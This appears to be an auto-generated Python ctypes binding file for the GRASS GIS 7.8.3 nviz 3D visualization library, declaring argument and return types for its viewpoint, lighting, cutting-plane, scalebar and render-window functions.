/Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 130 # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 132 class struct_render_window(Structure): pass struct_render_window.__slots__ = [ 'contextId', 'width', 'height', ] struct_render_window._fields_ = [ ('contextId', CGLContextObj), ('width', c_int), ('height', c_int), ] # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 5 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_resize_window'): continue Nviz_resize_window = _lib.Nviz_resize_window Nviz_resize_window.argtypes = [c_int, c_int] Nviz_resize_window.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 6 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_update_ranges'): continue Nviz_update_ranges = _lib.Nviz_update_ranges Nviz_update_ranges.argtypes = [POINTER(nv_data)] Nviz_update_ranges.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 7 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_position'): continue Nviz_set_viewpoint_position = _lib.Nviz_set_viewpoint_position Nviz_set_viewpoint_position.argtypes = [c_double, c_double] Nviz_set_viewpoint_position.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 8 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_viewpoint_position'): continue Nviz_get_viewpoint_position = _lib.Nviz_get_viewpoint_position Nviz_get_viewpoint_position.argtypes = [POINTER(c_double), POINTER(c_double)] Nviz_get_viewpoint_position.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 9 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_height'): continue Nviz_set_viewpoint_height = _lib.Nviz_set_viewpoint_height Nviz_set_viewpoint_height.argtypes = [c_double] Nviz_set_viewpoint_height.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 10 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_viewpoint_height'): continue Nviz_get_viewpoint_height = _lib.Nviz_get_viewpoint_height Nviz_get_viewpoint_height.argtypes = [POINTER(c_double)] Nviz_get_viewpoint_height.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 11 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_persp'): continue Nviz_set_viewpoint_persp = _lib.Nviz_set_viewpoint_persp Nviz_set_viewpoint_persp.argtypes = [c_int] Nviz_set_viewpoint_persp.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 12 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_viewpoint_twist'): continue Nviz_set_viewpoint_twist = _lib.Nviz_set_viewpoint_twist Nviz_set_viewpoint_twist.argtypes = [c_int] Nviz_set_viewpoint_twist.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 13 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_change_exag'): continue Nviz_change_exag = _lib.Nviz_change_exag Nviz_change_exag.argtypes = [POINTER(nv_data), c_double] Nviz_change_exag.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 14 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_look_here'): continue Nviz_look_here = _lib.Nviz_look_here Nviz_look_here.argtypes = [c_double, c_double] Nviz_look_here.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 15 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_modelview'): continue Nviz_get_modelview = _lib.Nviz_get_modelview Nviz_get_modelview.argtypes = [POINTER(c_double)] Nviz_get_modelview.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 16 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_rotation'): continue Nviz_set_rotation = _lib.Nviz_set_rotation Nviz_set_rotation.argtypes = [c_double, c_double, c_double, c_double] Nviz_set_rotation.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 17 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_unset_rotation'): continue Nviz_unset_rotation = _lib.Nviz_unset_rotation Nviz_unset_rotation.argtypes = [] Nviz_unset_rotation.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 18 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_init_rotation'): continue Nviz_init_rotation = _lib.Nviz_init_rotation Nviz_init_rotation.argtypes = [] Nviz_init_rotation.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 19 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_flythrough'): continue Nviz_flythrough = _lib.Nviz_flythrough Nviz_flythrough.argtypes = [POINTER(nv_data), POINTER(c_float), POINTER(c_int), c_int] Nviz_flythrough.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 22 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_cplane'): continue Nviz_new_cplane = _lib.Nviz_new_cplane Nviz_new_cplane.argtypes = [POINTER(nv_data), c_int] Nviz_new_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 23 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_on_cplane'): continue Nviz_on_cplane = _lib.Nviz_on_cplane Nviz_on_cplane.argtypes = [POINTER(nv_data), c_int] Nviz_on_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 24 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_off_cplane'): continue Nviz_off_cplane = _lib.Nviz_off_cplane Nviz_off_cplane.argtypes = [POINTER(nv_data), c_int] Nviz_off_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 25 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_cplane'): continue Nviz_draw_cplane = _lib.Nviz_draw_cplane Nviz_draw_cplane.argtypes = [POINTER(nv_data), c_int, c_int] Nviz_draw_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 26 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_num_cplanes'): continue Nviz_num_cplanes = _lib.Nviz_num_cplanes Nviz_num_cplanes.argtypes = [POINTER(nv_data)] Nviz_num_cplanes.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 27 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_current_cplane'): continue Nviz_get_current_cplane = _lib.Nviz_get_current_cplane Nviz_get_current_cplane.argtypes = [POINTER(nv_data)] Nviz_get_current_cplane.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 28 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_cplane_rotation'): continue Nviz_set_cplane_rotation = _lib.Nviz_set_cplane_rotation Nviz_set_cplane_rotation.argtypes = [POINTER(nv_data), c_int, c_float, c_float, c_float] Nviz_set_cplane_rotation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 29 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_cplane_rotation'): continue Nviz_get_cplane_rotation = _lib.Nviz_get_cplane_rotation Nviz_get_cplane_rotation.argtypes = [POINTER(nv_data), c_int, POINTER(c_float), POINTER(c_float), POINTER(c_float)] Nviz_get_cplane_rotation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 30 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_cplane_translation'): continue Nviz_set_cplane_translation = _lib.Nviz_set_cplane_translation Nviz_set_cplane_translation.argtypes = [POINTER(nv_data), c_int, c_float, c_float, c_float] Nviz_set_cplane_translation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 31 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_cplane_translation'): continue Nviz_get_cplane_translation = _lib.Nviz_get_cplane_translation Nviz_get_cplane_translation.argtypes = [POINTER(nv_data), c_int, POINTER(c_float), POINTER(c_float), POINTER(c_float)] Nviz_get_cplane_translation.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 32 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_fence_color'): continue Nviz_set_fence_color = _lib.Nviz_set_fence_color Nviz_set_fence_color.argtypes = [POINTER(nv_data), c_int] Nviz_set_fence_color.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 33 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_cplane_here'): continue Nviz_set_cplane_here = _lib.Nviz_set_cplane_here Nviz_set_cplane_here.argtypes = [POINTER(nv_data), c_int, c_float, c_float] Nviz_set_cplane_here.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 37 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_all_surf'): continue Nviz_draw_all_surf = _lib.Nviz_draw_all_surf Nviz_draw_all_surf.argtypes = [POINTER(nv_data)] Nviz_draw_all_surf.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 38 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_all_vect'): continue Nviz_draw_all_vect = _lib.Nviz_draw_all_vect Nviz_draw_all_vect.argtypes = [] Nviz_draw_all_vect.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 39 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_all_site'): continue Nviz_draw_all_site = _lib.Nviz_draw_all_site Nviz_draw_all_site.argtypes = [] Nviz_draw_all_site.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 40 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_all_vol'): continue Nviz_draw_all_vol = _lib.Nviz_draw_all_vol Nviz_draw_all_vol.argtypes = [] Nviz_draw_all_vol.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 41 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_all'): continue Nviz_draw_all = _lib.Nviz_draw_all Nviz_draw_all.argtypes = [POINTER(nv_data)] Nviz_draw_all.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 42 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_quick'): continue Nviz_draw_quick = _lib.Nviz_draw_quick Nviz_draw_quick.argtypes = [POINTER(nv_data), c_int] Nviz_draw_quick.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 43 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_load_image'): continue Nviz_load_image = _lib.Nviz_load_image Nviz_load_image.argtypes = [POINTER(GLubyte), c_int, c_int, c_int] Nviz_load_image.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 44 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_image'): continue Nviz_draw_image = _lib.Nviz_draw_image Nviz_draw_image.argtypes = [c_int, c_int, c_int, c_int, c_int] Nviz_draw_image.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 45 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_2D'): continue Nviz_set_2D = _lib.Nviz_set_2D Nviz_set_2D.argtypes = [c_int, c_int] Nviz_set_2D.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 46 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_del_texture'): continue Nviz_del_texture = _lib.Nviz_del_texture Nviz_del_texture.argtypes = [c_int] Nviz_del_texture.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 47 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_max_texture'): continue Nviz_get_max_texture = _lib.Nviz_get_max_texture Nviz_get_max_texture.argtypes = [POINTER(c_int)] Nviz_get_max_texture.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 50 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_exag_height'): continue Nviz_get_exag_height = _lib.Nviz_get_exag_height Nviz_get_exag_height.argtypes = [POINTER(c_double), POINTER(c_double), POINTER(c_double)] Nviz_get_exag_height.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 51 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_exag'): continue Nviz_get_exag = _lib.Nviz_get_exag Nviz_get_exag.argtypes = [] Nviz_get_exag.restype = c_double break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 54 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_light_position'): continue Nviz_set_light_position = _lib.Nviz_set_light_position Nviz_set_light_position.argtypes = [POINTER(nv_data), c_int, c_double, c_double, c_double, c_double] Nviz_set_light_position.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 55 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_light_bright'): continue Nviz_set_light_bright = _lib.Nviz_set_light_bright Nviz_set_light_bright.argtypes = [POINTER(nv_data), c_int, c_double] Nviz_set_light_bright.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 56 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_light_color'): continue Nviz_set_light_color = _lib.Nviz_set_light_color Nviz_set_light_color.argtypes = [POINTER(nv_data), c_int, c_int, c_int, c_int] Nviz_set_light_color.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 57 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_light_ambient'): continue Nviz_set_light_ambient = _lib.Nviz_set_light_ambient Nviz_set_light_ambient.argtypes = [POINTER(nv_data), c_int, c_double] Nviz_set_light_ambient.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 58 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_init_light'): continue Nviz_init_light = _lib.Nviz_init_light Nviz_init_light.argtypes = [POINTER(nv_data), c_int] Nviz_init_light.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 59 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_light'): continue Nviz_new_light = _lib.Nviz_new_light Nviz_new_light.argtypes = [POINTER(nv_data)] Nviz_new_light.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 60 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_model'): continue Nviz_draw_model = _lib.Nviz_draw_model Nviz_draw_model.argtypes = [POINTER(nv_data)] Nviz_draw_model.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 63 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_map_obj'): continue Nviz_new_map_obj = _lib.Nviz_new_map_obj Nviz_new_map_obj.argtypes = [c_int, String, c_double, POINTER(nv_data)] Nviz_new_map_obj.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 64 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_attr'): continue Nviz_set_attr = _lib.Nviz_set_attr Nviz_set_attr.argtypes = [c_int, c_int, c_int, c_int, String, c_double, POINTER(nv_data)] Nviz_set_attr.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 65 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_surface_attr_default'): continue Nviz_set_surface_attr_default = _lib.Nviz_set_surface_attr_default Nviz_set_surface_attr_default.argtypes = [] Nviz_set_surface_attr_default.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 66 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_vpoint_attr_default'): continue Nviz_set_vpoint_attr_default = _lib.Nviz_set_vpoint_attr_default Nviz_set_vpoint_attr_default.argtypes = [] Nviz_set_vpoint_attr_default.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 67 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_volume_attr_default'): continue Nviz_set_volume_attr_default = _lib.Nviz_set_volume_attr_default Nviz_set_volume_attr_default.argtypes = [] Nviz_set_volume_attr_default.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 68 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_unset_attr'): continue Nviz_unset_attr = _lib.Nviz_unset_attr Nviz_unset_attr.argtypes = [c_int, c_int, c_int] Nviz_unset_attr.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 71 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_init_data'): continue Nviz_init_data = _lib.Nviz_init_data Nviz_init_data.argtypes = [POINTER(nv_data)] Nviz_init_data.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 72 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_destroy_data'): continue Nviz_destroy_data = _lib.Nviz_destroy_data Nviz_destroy_data.argtypes = [POINTER(nv_data)] Nviz_destroy_data.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 73 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_bgcolor'): continue Nviz_set_bgcolor = _lib.Nviz_set_bgcolor Nviz_set_bgcolor.argtypes = [POINTER(nv_data), c_int] Nviz_set_bgcolor.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 74 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_bgcolor'): continue Nviz_get_bgcolor = _lib.Nviz_get_bgcolor Nviz_get_bgcolor.argtypes = [POINTER(nv_data)] Nviz_get_bgcolor.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 75 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_color_from_str'): continue Nviz_color_from_str = _lib.Nviz_color_from_str Nviz_color_from_str.argtypes = [String] Nviz_color_from_str.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 76 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_fringe'): continue Nviz_new_fringe = _lib.Nviz_new_fringe Nviz_new_fringe.argtypes = [POINTER(nv_data), c_int, c_ulong, c_double, c_int, c_int, c_int, c_int] Nviz_new_fringe.restype = POINTER(struct_fringe_data) break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 78 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_fringe'): continue Nviz_set_fringe = _lib.Nviz_set_fringe Nviz_set_fringe.argtypes = [POINTER(nv_data), c_int, c_ulong, c_double, c_int, c_int, c_int, c_int] Nviz_set_fringe.restype = POINTER(struct_fringe_data) break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 80 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_fringe'): continue Nviz_draw_fringe = _lib.Nviz_draw_fringe Nviz_draw_fringe.argtypes = [POINTER(nv_data)] Nviz_draw_fringe.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 81 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_arrow'): continue Nviz_draw_arrow = _lib.Nviz_draw_arrow Nviz_draw_arrow.argtypes = [POINTER(nv_data)] Nviz_draw_arrow.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 82 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_arrow'): continue Nviz_set_arrow = _lib.Nviz_set_arrow Nviz_set_arrow.argtypes = [POINTER(nv_data), c_int, c_int, c_float, c_uint] Nviz_set_arrow.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 83 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_delete_arrow'): continue Nviz_delete_arrow = _lib.Nviz_delete_arrow Nviz_delete_arrow.argtypes = [POINTER(nv_data)] Nviz_delete_arrow.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 84 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_scalebar'): continue Nviz_new_scalebar = _lib.Nviz_new_scalebar Nviz_new_scalebar.argtypes = [POINTER(nv_data), c_int, POINTER(c_float), c_float, c_uint] Nviz_new_scalebar.restype = POINTER(struct_scalebar_data) break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 85 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_scalebar'): continue Nviz_set_scalebar = _lib.Nviz_set_scalebar Nviz_set_scalebar.argtypes = [POINTER(nv_data), c_int, c_int, c_int, c_float, c_uint] Nviz_set_scalebar.restype = POINTER(struct_scalebar_data) break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 86 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_draw_scalebar'): continue Nviz_draw_scalebar = _lib.Nviz_draw_scalebar Nviz_draw_scalebar.argtypes = [POINTER(nv_data)] Nviz_draw_scalebar.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 87 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_delete_scalebar'): continue Nviz_delete_scalebar = _lib.Nviz_delete_scalebar Nviz_delete_scalebar.argtypes = [POINTER(nv_data), c_int] Nviz_delete_scalebar.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 90 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_init_view'): continue Nviz_init_view = _lib.Nviz_init_view Nviz_init_view.argtypes = [POINTER(nv_data)] Nviz_init_view.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 91 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_focus_state'): continue Nviz_set_focus_state = _lib.Nviz_set_focus_state Nviz_set_focus_state.argtypes = [c_int] Nviz_set_focus_state.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 92 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_focus_map'): continue Nviz_set_focus_map = _lib.Nviz_set_focus_map Nviz_set_focus_map.argtypes = [c_int, c_int] Nviz_set_focus_map.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 93 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_has_focus'): continue Nviz_has_focus = _lib.Nviz_has_focus Nviz_has_focus.argtypes = [POINTER(nv_data)] Nviz_has_focus.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 94 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_set_focus'): continue Nviz_set_focus = _lib.Nviz_set_focus Nviz_set_focus.argtypes = [POINTER(nv_data), c_float, c_float, c_float] Nviz_set_focus.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 95 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_focus'): continue Nviz_get_focus = _lib.Nviz_get_focus Nviz_get_focus.argtypes = [POINTER(nv_data), POINTER(c_float), POINTER(c_float), POINTER(c_float)] Nviz_get_focus.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 96 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_xyrange'): continue Nviz_get_xyrange = _lib.Nviz_get_xyrange Nviz_get_xyrange.argtypes = [POINTER(nv_data)] Nviz_get_xyrange.restype = c_float break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 97 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_zrange'): continue Nviz_get_zrange = _lib.Nviz_get_zrange Nviz_get_zrange.argtypes = [POINTER(nv_data), POINTER(c_float), POINTER(c_float)] Nviz_get_zrange.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 98 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_get_longdim'): continue Nviz_get_longdim = _lib.Nviz_get_longdim Nviz_get_longdim.argtypes = [POINTER(nv_data)] Nviz_get_longdim.restype = c_float break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 101 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_new_render_window'): continue Nviz_new_render_window = _lib.Nviz_new_render_window Nviz_new_render_window.argtypes = [] Nviz_new_render_window.restype = POINTER(struct_render_window) break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 102 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_init_render_window'): continue Nviz_init_render_window = _lib.Nviz_init_render_window Nviz_init_render_window.argtypes = [POINTER(struct_render_window)] Nviz_init_render_window.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 103 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_destroy_render_window'): continue Nviz_destroy_render_window = _lib.Nviz_destroy_render_window Nviz_destroy_render_window.argtypes = [POINTER(struct_render_window)] Nviz_destroy_render_window.restype = None break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 